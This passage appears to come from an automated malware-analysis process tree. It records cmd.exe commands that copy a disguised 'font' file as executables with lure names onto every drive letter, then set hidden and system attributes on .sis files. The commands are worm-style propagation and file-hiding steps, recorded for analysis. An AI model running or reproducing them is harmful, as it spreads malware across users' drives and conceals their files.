- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Music\RHM.exe /y
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Music\RHM.exe /y
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Music\RHM.exe /y
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Music\RHM.exe /y
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Music\RHM.exe /y
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Music\RHM.exe /y
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Music\RHM.exe /y
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Music\RHM.exe /y
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Music\RHM.exe /y
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Music\RHM.exe /y
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Music\RHM.exe /y
    3⤵
    PID:2904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Music\RHM.exe /y
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Music\RHM.exe /y
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Music\RHM.exe /y
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Music\RHM.exe /y
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Music\M.exe /y
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Music\M.exe /y
    3⤵
    PID:2312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Music\M.exe /y
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Music\M.exe /y
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Music\M.exe /y
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Music\M.exe /y
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Music\M.exe /y
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Music\M.exe /y
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Music\M.exe /y
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Music\M.exe /y
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Music\M.exe /y
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Music\M.exe /y
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Music\M.exe /y
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Music\M.exe /y
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Music\M.exe /y
    3⤵
    PID:2608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Music\M.exe /y
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Music\M.exe /y
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Music\M.exe /y
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Music\M.exe /y
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Music\M.exe /y
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Music\M.exe /y
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Music\M.exe /y
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Music\M.exe /y
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Music\M.exe /y
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Photos\Starkhmer.exe /y
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Photos\Starkhmer.exe /y
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Photos\Starkhmer.exe /y
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Photos\Starkhmer.exe /y
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Photos\Starkhmer.exe /y
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Photos\Starkhmer.exe /y
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Photos\Starkhmer.exe /y
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Photos\Starkhmer.exe /y
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Photos\Starkhmer.exe /y
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Photos\Starkhmer.exe /y
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Photos\Starkhmer.exe /y
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Photos\Starkhmer.exe /y
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Photos\Starkhmer.exe /y
    3⤵
    PID:340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Photos\Starkhmer.exe /y
    3⤵
    PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Photos\Starkhmer.exe /y
    3⤵
    PID:2196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Photos\Starkhmer.exe /y
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Photos\Starkhmer.exe /y
    3⤵
    PID:816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Photos\Starkhmer.exe /y
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Photos\Starkhmer.exe /y
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Photos\Starkhmer.exe /y
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Photos\Starkhmer.exe /y
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Photos\Starkhmer.exe /y
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Photos\Starkhmer.exe /y
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Photos\Starkhmer.exe /y
    3⤵
    PID:852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Mp3\English.exe /y
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Mp3\English.exe /y
    3⤵
    PID:328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Mp3\English.exe /y
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Mp3\English.exe /y
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Mp3\English.exe /y
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Mp3\English.exe /y
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Mp3\English.exe /y
    3⤵
    PID:780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Mp3\English.exe /y
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Mp3\English.exe /y
    3⤵
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Mp3\English.exe /y
    3⤵
    PID:580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Mp3\English.exe /y
    3⤵
    PID:320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Mp3\English.exe /y
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Mp3\English.exe /y
    3⤵
    PID:536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Mp3\English.exe /y
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Mp3\English.exe /y
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Mp3\English.exe /y
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Mp3\English.exe /y
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Mp3\English.exe /y
    3⤵
    PID:2216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Mp3\English.exe /y
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Mp3\English.exe /y
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Mp3\English.exe /y
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Mp3\English.exe /y
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Mp3\English.exe /y
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Mp3\English.exe /y
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Mp3\Thai.exe /y
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Mp3\Thai.exe /y
    3⤵
    PID:376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Mp3\Thai.exe /y
    3⤵
    PID:2112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Mp3\Thai.exe /y
    3⤵
    PID:2072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Mp3\Thai.exe /y
    3⤵
    PID:2476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Mp3\Thai.exe /y
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Mp3\Thai.exe /y
    3⤵
    PID:448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Mp3\Thai.exe /y
    3⤵
    PID:276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Mp3\Thai.exe /y
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Mp3\Thai.exe /y
    3⤵
    PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Mp3\Thai.exe /y
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Mp3\Thai.exe /y
    3⤵
    PID:652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Mp3\Thai.exe /y
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Mp3\Thai.exe /y
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Mp3\Thai.exe /y
    3⤵
    PID:696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Mp3\Thai.exe /y
    3⤵
    PID:832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Mp3\Thai.exe /y
    3⤵
    PID:1200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Mp3\Thai.exe /y
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Mp3\Thai.exe /y
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Mp3\Thai.exe /y
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Mp3\Thai.exe /y
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Mp3\Thai.exe /y
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Mp3\Thai.exe /y
    3⤵
    PID:988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Mp3\Thai.exe /y
    3⤵
    PID:876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:2392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Phone-Soft\SmartMovies.exe /y
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul attrib +r +h +s c:\*.sis /s
    3⤵
    PID:1324
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s c:\*.sis /s
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul attrib +r +h +s d:\*.sis /s
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul attrib +r +h +s e:\*.sis /s
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul attrib +r +h +s f:\*.sis /s
    3⤵
    PID:1252
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s f:\*.sis /s
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:1376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul attrib +r +h +s g:\*.sis /s
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul attrib +r +h +s h:\*.sis /s
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul attrib +r +h +s i:\*.sis /s
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul attrib +r +h +s j:\*.sis /s
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul attrib +r +h +s k:\*.sis /s
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cmd.exe
